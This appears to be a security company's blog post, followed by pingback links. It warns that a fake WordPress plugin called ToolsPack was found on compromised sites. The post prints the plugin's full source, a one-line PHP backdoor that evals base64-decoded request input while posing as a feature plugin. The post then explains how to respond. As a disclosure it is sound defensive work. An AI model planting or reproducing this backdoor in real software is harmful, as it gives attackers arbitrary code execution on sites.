We deal with many compromised sites daily and lately we are seeing something in common across many of the sites running WordPress.
They have installed a plugin called ToolsPack ( ./wp-content/plugins/ToolsPack/ToolsPack.php), which according to the author will “Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!”
Interesting…
However, when we look at the plugin code, all it does is this:
<?php
/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
?>
If you are not familiar with PHP, this is just a backdoor that allows attackers to execute any code on your site. If you see this plugin installed on your system, remove it right away!
How this plugin got in there is a different question. On some of compromised websites we noticed it implemented via wp-admin (so stolen passwords), and on others it is being installed via another backdoor.
Removing this plugin will not likely solve your security issues. You have to do a full review of the website – check all your files, update WordPress, change passwords, etc.
Have you seen this plugin, or something like it? make sure to leave a comment with your experience.
Site is hacked? Not sure? Check here http://sitecheck.sucuri.net
Pingback: New WordPress ToolsPack Plug-in Based Exploit Causing Issues | TheTechJournal
Pingback: Risk vs Transparency | Ipstenu on Tech
Pingback: Lizard's Weblog » Wordpress Compromised
Pingback: 30,000 WordPress Installs Compromised In Newest Round of Malware | CMS e-guide
Pingback: Ask Sucuri: Talk More About Web-Based Malware | Sucuri
Pingback: 30,000 WordPress Blogs Infected to Distribute Rogue Antivirus Software | ANTIVIRUS.CO.IN
Pingback: Apple finalmente lanza parches Java para malware Flashback | EnHacke
Pingback: Do not let your Wordpress blog be a launchpad for malware.
Pingback: As many as 100,000 WordPress blogs infected 700,000 Macs with malware | Matias Vangsnes
Pingback: Web Malware Trends and the Mac Flashfake / Flashback Outbreak | Sucuri
Pingback: 600000 macs infected - Page 3
Pingback: Mac Flashback Trojan: The WordPress Connection | The High-Tech Coach
Pingback: Flashback numbers not going down – still over half a million »
Pingback: Review of the WordFence Plugin – Effective or Not? - PerezBox
Pingback: The anatomy of Flashfake. Part 1 | 0xicf
Pingback: Fall of man? No! Fall of WordPress hackers? Yes! | Easy jQuery | Free Popular Tips Tricks Plugins API Javascript and Themes
Pingback: Seguridad en WordPress: Estas Protegido De Este Nuevo Ataque? | My Blog
Pingback: WordPress Installs compromised with Malware - Blog Ham
Pingback: 2012 Web Malware Trends Report Summary | Sucuri Blog